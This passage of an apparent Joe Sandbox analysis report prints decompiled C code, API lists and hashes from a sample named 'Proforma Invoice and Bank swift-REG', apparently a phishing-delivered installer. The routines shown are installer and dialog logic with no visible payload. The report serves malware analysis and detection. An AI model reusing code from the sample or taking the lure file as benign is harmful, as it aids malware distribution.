					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402656
0x0040266a
0x00402675
0x00402676
0x004027b1
0x00402658
0x00402658
0x0040265a
0x0040265c
0x0040265c
0x0040288e
0x0040289a

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403a4e
0x00403a57
0x00403b98
0x00403b9c
0x00403ba0
0x00403ba2
0x00403ba7
0x00403bb2
0x00403bbd
0x00403bc2
0x00403bc4
0x00403bc6
0x00403bc9
0x00403bce
0x00403bdc
0x00403be9
0x00403bf0
0x00403bf0
0x00403bf1
0x00403bf1
0x00403bf6
0x00403bfc
0x00403c03
0x00403c09
0x00403c0b
0x00403c4b
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00403c63
0x00403c65
0x00403c6a
0x00403c70
0x00403c74
0x00403c74
0x00403c79
0x00403c7f
0x00000000
0x00000000
0x00403c8a
0x00403c90
0x00000000
0x00000000
0x00403c99
0x00403ca1
0x00403ca6
0x00403ca9
0x00403caf
0x00403cb4
0x00403cb7
0x00403cbd
0x00403cc2
0x00403cc5
0x00403ccb
0x00403cd3
0x00403cd9
0x00403cdf
0x00403ce3
0x00403cea
0x00403cea
0x00403cea
0x00403cf4
0x00403d06
0x00403d12
0x00403d17
0x00403d21
0x00403d27
0x00403d29
0x00403d2e
0x00403d2b
0x00403d2b
0x00403d2b
0x00403d3e
0x00403d56
0x00403d58
0x00403d5e
0x00403d73
0x00403d60
0x00403d69
0x00403d6b
0x00403d6b
0x00403d79
0x00403d89
0x00403d9a
0x00403da1
0x00403da7
0x00403dab
0x00403db0
0x00403db2
0x00000000
0x00403db8
0x00403db8
0x00403dba
0x00000000
0x00000000
0x00403dc0
0x00403dc4
0x00403de9
0x00403def
0x00403df5
0x00403df7
0x00000000
0x00000000
0x00403e1d
0x00403e23
0x00403e25
0x00403e2a
0x00000000
0x00000000
0x00403e30
0x00403e33
0x00403e36
0x00403e4d
0x00403e59
0x00403e72
0x00403e78
0x00403e7c
0x00403e81
0x00403e87
0x00000000
0x00000000
0x00403e91
0x00403e9c
0x00000000
0x00403e9c
0x00403dc6
0x00403dcc
0x00000000
0x00000000
0x00403dd2
0x00403dd8
0x00000000
0x00000000
0x00000000
0x00403dde
0x00403db2
0x00403ea9
0x00403eb5
0x00403ebc
0x00000000
0x00403c0d
0x00403c0d
0x00403c10
0x00403c43
0x00403c43
0x00403c45
0x00000000
0x00000000
0x00000000
0x00403c45
0x00403c12
0x00403c16
0x00403c1b
0x00403c1d
0x00000000
0x00000000
0x00403c2d
0x00403c35
0x00000000
0x00403c3b
0x00403a69
0x00403a69
0x00403a6d
0x00403a72
0x00403a81
0x00403a81
0x00403a8a
0x00403a93
0x00403a9e
0x00403a9e
0x00403aaa
0x00403ac6
0x00403ac9
0x00403adc
0x00403ae2
0x00403b85
0x00000000
0x00403b8e
0x00403ae8
0x00403af5
0x00403af7
0x00403af9
0x00403b18
0x00403b18
0x00403b1b
0x00403b20
0x00403b23
0x00403b33
0x00403b34
0x00403b36
0x00403b6c
0x00403b7f
0x00000000
0x00403b7f
0x00403b38
0x00403b3e
0x00403b57
0x00403b5c
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b4c
0x00403b4c
0x00403b4e
0x00403b4e
0x00000000
0x00403b4e
0x00403b41
0x00403b46
0x00000000
0x00403b46
0x00403b25
0x00403b2b
0x00000000
0x00000000
0x00403b2d
0x00000000
0x00403b2d
0x00403b1d
0x00000000
0x00403b1d
0x00403b03
0x00403b0a
0x00403b10
0x00403b12
0x00000000
0x00000000
0x00000000
0x00403b12
0x00403ace
0x00000000
0x00403aac
0x00403ab2
0x00403abc
0x00403ec2
0x00403ec8
0x00403ed5
0x00403edb
0x00403edb
0x00403ee5
0x00000000
0x00403ee5
0x00403aaa

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
ShowWindow.USER32(?), ref: 00403A9E
DestroyWindow.USER32 ref: 00403AB2
SetWindowLongA.USER32 ref: 00403ACE
GetDlgItem.USER32 ref: 00403AEF
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
IsWindowEnabled.USER32(00000000), ref: 00403B0A
GetDlgItem.USER32 ref: 00403BB8
GetDlgItem.USER32 ref: 00403BC2
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
GetDlgItem.USER32 ref: 00403CD3
ShowWindow.USER32(00000000,?), ref: 00403CF4
EnableWindow.USER32(?,?), ref: 00403D06
EnableWindow.USER32(?,?), ref: 00403D21
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
EnableMenuItem.USER32 ref: 00403D3E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
ShowWindow.USER32(?,0000000A), ref: 00403ED5

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

0x00404070
0x00404196
0x004041f2
0x004041f6
0x004042cd
0x004042cf
0x004042cf
0x004042d5
0x004042d5
0x004042d8
0x00000000
0x004042df
0x00404204
0x00404206
0x00404210
0x0040421b
0x0040421e
0x00404221
0x0040422c
0x0040422f
0x00404236
0x00404244
0x0040425c
0x00404264
0x0040426f
0x0040427f
0x00404281
0x00404281
0x00404236
0x0040428b
0x00000000
0x00404296
0x0040429a
0x004042ab
0x004042ab
0x004042b1
0x004042bf
0x004042bf
0x00000000
0x004042c3
0x0040428b
0x004041a1
0x00000000
0x004041b5
0x004041bb
0x004041c1
0x00000000
0x00000000
0x004041e6
0x004041e8
0x004041ed
0x00000000
0x004041ed
0x004041a1
0x00404076
0x00404079
0x0040407e
0x0040408f
0x0040408f
0x00404096
0x00404099
0x0040409b
0x004040a0
0x004040a9
0x004040af
0x004040bb
0x004040be
0x004040c7
0x004040cc
0x004040cf
0x004040d4
0x004040eb
0x004040f2
0x00404105
0x00404108
0x0040411d
0x00404124
0x00404129
0x0040412e
0x0040412e
0x0040413d
0x0040414c
0x0040414e
0x00404164
0x00404173
0x00404175
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
GetDlgItem.USER32 ref: 004040FF
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
GetSysColor.USER32(?), ref: 0040412E
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
lstrlenA.KERNEL32(?), ref: 00404156
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
GetDlgItem.USER32 ref: 004041D6
SendMessageA.USER32(00000000), ref: 004041D9
GetDlgItem.USER32 ref: 00404204
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
LoadCursorA.USER32 ref: 00404253
SetCursor.USER32(00000000), ref: 0040425C
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
LoadCursorA.USER32 ref: 0040427C
SetCursor.USER32(00000000), ref: 0040427F
SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF

Strings

@.B, xrefs: 00404264
N, xrefs: 004041F2
open, xrefs: 00404267

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
